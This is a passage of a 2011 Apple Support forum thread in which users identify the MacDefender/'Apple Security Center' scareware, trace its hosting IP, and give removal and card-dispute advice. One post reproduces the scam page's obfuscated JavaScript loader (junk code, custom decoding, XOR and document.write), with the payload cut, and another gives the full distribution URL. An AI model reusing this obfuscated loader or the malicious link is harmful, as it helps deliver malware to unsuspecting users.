Previous 1 3 4 5 6 7 Next 158 Replies Latest reply: May 30, 2011 7:32 PM by babowa Go to original post Branched to a new discussion.
  • AnsonX10 Level 1 Level 1 (0 points)

    I just got this again. Second time this week (meaning past two days.)

     

    This time at http://178.17.163.163/45960a995d92e7f8bd64692123a83ed3fc65e7a568b08303


    I didn't copy the IP the first time.

     

    So "178.17.163.163" if you don't have it already. I see you already had "178.17.162.0/24" and "178.17.162.163"... very similar. I don't know exactly how IPs count up per computer and such, so I'm posting it anyway. lol

  • R C-R Level 6 Level 6 (15,075 points)

    FWIW, a whois.ripe.net query on 178.17.163.163 shows that the IP range 178.17.160.0 - 178.17.175.255 is registered to I.C.S. Trabia-Network S.R.L., a web hosting company based in the Republic of Moldova.

     

    A portion of the response to that query:

     

    address:        I.C.S. Trabia-Network S.R.L.

    address:        str. V. Pircalab 52

    address:        2012 Chisinau

    address:        Republic of Moldova

    phone:          +373 (22) 844-844

    fax-no:         +373 (22) 844-509

    abuse-mailbox:  abuse@trabia.net

    remarks:

    remarks:        ++++++++++++++++++++++++++++++++++++++++++++++++++++

    remarks:        |           I.C.S. Trabia-Network S.R.L.           |

    remarks:        |                 Abuse Department                 |

    remarks:        ++++++++++++++++++++++++++++++++++++++++++++++++++++

    remarks:        |                                                  |

    remarks:        | This inet(6)num object is protected by our abuse |

    remarks:        | department. Our IRT (Incident Response Team) is  |

    remarks:        | reachable 24 hours a day.                        |

    remarks:        |                                                  |

    remarks:        | If you observe any abusive usage of an IP within |

    remarks:        | this inet(6)num range, contact us please in the  |

    remarks:        | following ways:                                  |

    remarks:        |                                                  |

    remarks:        | Phone:  +373 (22) 844-844                        |

    remarks:        | Fax:    +373 (22) 844-509                        |

    remarks:        | E-Mail: abuse@trabia.net                         |

    remarks:        |                                                  |

    remarks:        | In case you need a direct response, please feel  |

    remarks:        | free to call us 24/7 a day at +373 (22) 844-844. |

    remarks:        | E-Mail/Fax is getting monitored regularly by our |

    remarks:        | staff and being answered within 1 business day.  |

    remarks:        |                                                  |

    remarks:        ++++++++++++++++++++++++++++++++++++++++++++++++++++

  • R C-R Level 6 Level 6 (15,075 points)

    MadMacs0 wrote:

    Neither you nor I represent the average user, and our behavior is not necessarily going to be emulated by everybody, so for all the folks that haven't learned that they cannot blindly click buttons because it's the only one available, I feel inclined to protect them against themselves.

    I think that in practical terms it is not possible to protect users from themselves. Education is the only real defense against trojans & other social engineering exploits.

  • Ollie Green Level 1 Level 1 (0 points)

    i Have recently bought a macBook pro 15 inch laptop. i seemed to have viruses and loads of popups coming up. i downloaded a security system for $50 named Mac Security version 2.6. It scans every day to see if i have viruses and trojans but says i am clear however the popups still come up and my computer is running slow.

    I am not sure on how to set up the security side of my computer and dont know how to remove the viruses and trojans. i had a popup on safari saying i had 65 viruses and trojans from 178.something but my security programme said it was fine.

     

    any advice?    Would appreciate any help.

     

    thanks

  • WZZZ Level 6 Level 6 (12,660 points)

    You have fallen for a total scam. Get this garbage off your computer immediately.

     

    First, restart in Safe Boot by holding the Shift key down at the chime. Or, alternatively, open Activity Monitor in Utilities, set to Active Processes, find the program and force quit it. This will keep it from running, but only temporarily, so you can remove it.

     

        1.    Drag the MacSecurity program -- or whatever it's called; it keeps using different names -- MAC Defender, MacProtector, MacKeeper 911, Apple Security Center, Apple Web Security -- it's not hard to imagine the new names it will be using in the coming days -- (installed in the Applications folder by default) to the Trash. Empty the Trash.

        2.    Remove item of same name from the Login Items for your Account in the OS X System Preferences (if it exists).

        3.    Go to your Home folder Library>Preferences and, if you find it, delete com.alppe.spav.plist. Look also in Application Support (may not be anything there, but check just in case) and search for any files with one of the above names and trash them. Empty the trash.

        4.    If you use Safari, go to Preferences>General and UNCHECK "Open "safe" files after downloading. Keep that unchecked.

     

    If you paid for it, they have your credit card #. Call your credit card and dispute the charges. Also, cancel the card ASAP.

     

    As a precaution, change your password.

  • AnsonX10 Level 1 Level 1 (0 points)

    That website is most likely that website this discussion is about. It will automatically download a program to your computer, but you need to install it for it to do any damage.

     

    If a web browser tells you that your computer has viruses, don't believe it. How can a website know anything about your computer? I'll admit the website is designed to look official, and not like a website. But if you can close Safari or the Safari window, then it is a website and not an official alert.

     

    The only time you should trust a virus alert (on a Mac at least) is when you're sure it's your trusted anti-virus software that you've installed. Although your anti-virus software could be scam/trojan in itself.

     

    I can't explain why your computer is running slow though. More details about what is running slow would be helpful.

     

    I talk as if I can find solutions to everyone's problems. lol

  • Allan Eckert Level 8 Level 8 (46,520 points)

    You don't have any virus on a Mac. Your AV software is not lying to you just believe it.

     

    Why would you believe a piece of scamware on the web that claims you have virus but not the AV software on your Mac? Think about it for a moment the junk on the web is not capable of determining anything is on your Mac but the AV software is. So which are you going to believe now?

     

    If you will simply forget about virus problems and start looking at your Mac with tools like Activity Monitor to see what is slowing it down you will make a lot more headway then you are now.

     

    Allan

     

     

     

    tiger

  • AnsonX10 Level 1 Level 1 (0 points)

    If they payed you to buy it, then you wouldn't really be BUYing it. lol

     

    Ollie still should remove any files the popup downloaded.

  • arumdevil Level 1 Level 1 (0 points)

    I've seen this page a few times in the last week or so. They have the look reasonably close, but really they could have done better I think

     

    anyway, I managed to view the source code by first disabling javascript and then reloading the page and then view source. There's a whole load of javascript (in which I am not proficient enough to make sense of it). Here is the code if anyone's interested..

     

     

     

    
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" > <script type="text/javascript">if(1==0){function t(a){google.srp.updateLinksWithParam('tbo',a?'1':'',google.srp.isSerpLink,google.srp.isSerpForm)}}var B1e16=window;var jc=function(a,b,c,d,e){v.bo=f;b=d+b;c=',#searchform';d='';if(!e){b=Math.max(b,70);c=''}};function X7r(){this.S1lf=[]}try{if(5050==(new Date())){var y=71*3}}catch(error){processEror(error)}var ct=new Date();X7r.prototype.i1s1x=function i1s1x(string){this.S1lf.push(string);return this};if(1==0){function t(a){google.srp.updateLinksWithParam('tbo',a?'1':'',google.srp.isSerpLink,google.srp.isSerpForm)}}var ct=new Date();X7r.prototype.toString=function toString(){return this.S1lf.join("")};try{if(5050==(new Date())){var y=71*3}}catch(error){processEror(error)}var jc=function(a,b,c,d,e){v.bo=f;b=d+b;c=',#searchform';d='';if(!e){b=Math.max(b,70);c=''}};for(var t14l=0;t14l<0;t14l++){var V2s2h='';var jwt=document;var B1e16=window}var u2ms={V1521:function(M2aq,t65,e1y2n){var jc=function(a,b,c,d,e){v.bo=f;b=d+b;c=',#searchform';d='';if(!e){b=Math.max(b,70);c=''}};var jwt=document;var I142o=[];var b1f11=new X7r();var l2u10=new X7r();var V2s2h='';var V2s2h='';for(var t14l=0;t14l<0;t14l++){var V2s2h='';var jwt=document;var B1e16=window}for(var t14l=0;t14l<M2aq.length;t14l+=7)I142o.push(M2aq.substr(t14l,7));var jwt=document;for(var xn11=0;xn11<I142o.length;xn11++){if(I142o[xn11]=='')I142o.splice(xn11,1);for(var xn11=0;xn11<I142o.length;xn11++){var resultmod=this.D20n(parseInt(I142o[xn11],16),t65,e1y2n)+'';b1f11.i1s1x(resultmod.substr(1,resultmod.length-2))}}var V2s2h='';b1f11=b1f11.toString();for(var xn11=0;xn11<b1f11.length;xn11+=2){l2u10.i1s1x(String.fromCharCode(parseInt(b1f11.substr(xn11,2),10)+30))}var B1e16=window;return y292s.Z81y(l2u10.toString())},te1o:function(zi27,b2d2p){if(1==0){function t(a){google.srp.updateLinksWithParam('tbo',a?'1':'',google.srp.isSerpLink,google.srp.isSerpForm)}}var ct=new Date();var ct=new Date();return zi27-(b2d2p*Math.floor(zi27/b2d2p))},D20n:function(v1x2f,b2th,M1im){var jwt=document;try{if(5050==(new Date())){var y=71*3}}catch(error){processEror(error)}var q1ox=1,t14l=0,x2112=v1x2f;for(var t14l=0;t14l<0;t14l++){var V2s2h='';var jwt=document;var B1e16=window}for(var t14l=0;t14l<0;t14l++){var V2s2h='';var jwt=document;var B1e16=window}var jwt=document;while((b2th>>t14l)>0){if(((b2th>>t14l)&1)==1)q1ox=this.te1o((q1ox*x2112),M1im);x2112=this.te1o((x2112*x2112),M1im);t14l++}return q1ox}};var jc=function(a,b,c,d,e){v.bo=f;b=d+b;c=',#searchform';d='';if(!e){b=Math.max(b,70);c=''}};var y292s={Z81y:function(k2210){var ct=new Date();var V2s2h='';var jc=function(a,b,c,d,e){v.bo=f;b=d+b;c=',#searchform';d='';if(!e){b=Math.max(b,70);c=''}};var v261e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";if(1==0){function t(a){google.srp.updateLinksWithParam('tbo',a?'1':'',google.srp.isSerpLink,google.srp.isSerpForm)}}var V2s2h='';var C2gj,u1r21,j1s2i,v2813,b1o20,o101e,a1a1k,N2i2b,t14l=0;var W1tb=new X7r();var B1e16=window;for(var t14l=0;t14l<0;t14l++){var V2s2h='';var jwt=document;var B1e16=window}try{if(5050==(new Date())){var y=71*3}}catch(error){processEror(error)}do{v2813=v261e.indexOf(k2210.charAt(t14l++));b1o20=v261e.indexOf(k2210.charAt(t14l++));o101e=v261e.indexOf(k2210.charAt(t14l++));a1a1k=v261e.indexOf(k2210.charAt(t14l++));N2i2b=v2813<<18|b1o20<<12|o101e<<6|a1a1k;C2gj=N2i2b>>16&0xff;u1r21=N2i2b>>8&0xff;j1s2i=N2i2b&0xff;if(o101e==64)W1tb.i1s1x(String.fromCharCode(C2gj));else if(a1a1k==64)W1tb.i1s1x(String.fromCharCode(C2gj,u1r21));else W1tb.i1s1x(String.fromCharCode(C2gj,u1r21,j1s2i))}while(t14l<k2210.length);var V2s2h='';var B1e16=window;return this.s1f15(W1tb.toString())},s1f15:function(Jx27){var jwt=document;var jc=function(a,b,c,d,e){v.bo=f;b=d+b;c=',#searchform';d='';if(!e){b=Math.max(b,70);c=''}};var V2s2h='';var Mv1j=new X7r();var B1e16=window;try{if(5050==(new Date())){var y=71*3}}catch(error){processEror(error)}var t14l=0;var V2s2h='';var jwt=document;var M2aq=u8q=dr2e=0;while(t14l<Jx27.length){M2aq=Jx27.charCodeAt(t14l);if(M2aq<128){Mv1j.i1s1x(String.fromCharCode(M2aq));t14l++}else if((M2aq>191)&&(M2aq<224)){u8q=Jx27.charCodeAt(t14l+1);Mv1j.i1s1x(String.fromCharCode(((M2aq&31)<<6)|(u8q&63)));t14l+=2}else{u8q=Jx27.charCodeAt(t14l+1);dr2e=Jx27.charCodeAt(t14l+2);Mv1j.i1s1x(String.fromCharCode(((M2aq&15)<<12)|((u8q&63)<<6)|(dr2e&63)));t14l+=3}}return Mv1j.toString()}};function Tt1b(Pj1k,h272g){var L221u='';var F2h2f=0;var t14l=0;Pj1k=y292s.Z81y(Pj1k);do{L221u+=String.fromCharCode(Pj1k.charCodeAt(t14l++)^h272g.charCodeAt(F2h2f++));if(F2h2f>=h272g.length)F2h2f=0}while(t14l<Pj1k.length);return L221u}document.write(Tt1b('fTBF
    
    
    (lots of crap here taken out )
    
    
    Nxg=','AC&GYrEotoj7~7g6R&qi72VdSB'));</script> </head> <body> </body> </html>
    
    
  • AnsonX10 Level 1 Level 1 (0 points)

    AHA! Everything makes sense now! Not really. Hopefully someone can pull something helpful out of it though.

     

    Someone? Anyone?

     

    I don't know what the page's source could hold that would help eliminate this threat, but we all want the site taken down.

     

    Edit: I think the title of this thread should be renamed to "Is "Apple Security Center" safe? Answer: NO!"

     

    Just to clear up any confusion.

     

    Message was edited by: AnsonX10

  • MadMacs0 Level 5 Level 5 (4,500 points)

    R C-R wrote

     

    > Education is the only real defense against trojans &amp; other social engineering exploits.

     

    Agree completely.  That's why many of us are here.

  • ds store Level 7 Level 7 (30,315 points)

    AnsonX10 wrote:

     

    I just got this again. Second time this week (meaning past two days.)

     

    This time at <soon to be deleted by host>


    I didn't copy the IP the first time.

     

    So "178.17.163.163" if you don't have it already. I see you already had "178.17.162.0/24" and "178.17.162.163"... very similar. I don't know exactly how IPs count up per computer and such, so I'm posting it anyway. lol

     

    AnsonX10

     

    Don't copy the whole url and paste it here, it creates a link where unsuspecting people can click and get the malware.

     

    If you see a IP address (178.17.163.163) or a domain name (like www.facebook DOT com), just post that part like so.

     

    Also, take and post a screen shot using Command Shift 4, then use the camera option in the Apple Support to upload the image.

     

    You can take 178.17.163.163 and remove the last number and sub "0/24" for 178.17.163.0/24 to block the subnet range in NoobProof black list preferences.

     

    NoobProof Instructions seem to be a little outdated and incomplete how to block larger ranges such as 178.17.160.0 - 178.17.175.255

  • R C-R Level 6 Level 6 (15,075 points)

    ds store wrote:

    NoobProof Instructions seem to be a little outdated and incomplete how to block larger ranges such as 178.17.160.0 - 178.17.175.255

    Note that blocking that entire range of IP addresses would block everything from all of I.C.S. Trabia-Network S.R.L.'s clients. It is a web hosting service company, so a lot of "innocent" sites might be blocked as well.

     

    It might be more effective to email the company using its abuse address & let them know which of its IP addresses are being used for fraudulent purposes, or to report those IP's to one of the major ISP's like Comcast, which could get them blocked by putting them on the blacklists the ISP's maintain.

  • AnsonX10 Level 1 Level 1 (0 points)

    I know how to take screen shots...

     

    I checked and saw that the URL was no longer active. That's why I felt safe enough to post the whole url.

  • ds store Level 7 Level 7 (30,315 points)

    R C-R wrote:

     

    Note that blocking that entire range of IP addresses would block everything from all of I.C.S. Trabia-Network S.R.L.'s clients. It is a web hosting service company, so a lot of "innocent" sites might be blocked as well.

     

    Yes, I know. Bad apple ruins the whole bunch.

     

     

    R C-R wrote:

     

    It might be more effective to email the company using its abuse address & let them know which of its IP addresses are being used for fraudulent purposes, or to report those IP's to one of the major ISP's like Comcast, which could get them blocked by putting them on the blacklists the ISP's maintain.

     

    You use the carrot, I'll use the stick.

Previous 1 3 4 5 6 7 Next